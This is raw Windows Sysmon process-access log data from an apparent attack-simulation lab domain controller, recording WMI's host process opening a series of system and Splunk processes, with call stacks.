16:03:50.921{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029761Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.921{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029760Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.921{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029759Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.921{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029758Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.921{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029757Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.921{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029756Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.921{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029755Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.921{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029754Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.921{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029753Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.921{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029752Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.905{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029751Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.905{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029750Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.905{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029749Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.905{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029748Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.905{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029747Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.905{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029746Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.905{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029745Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.905{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029744Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.905{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029743Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.905{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029742Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.905{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program 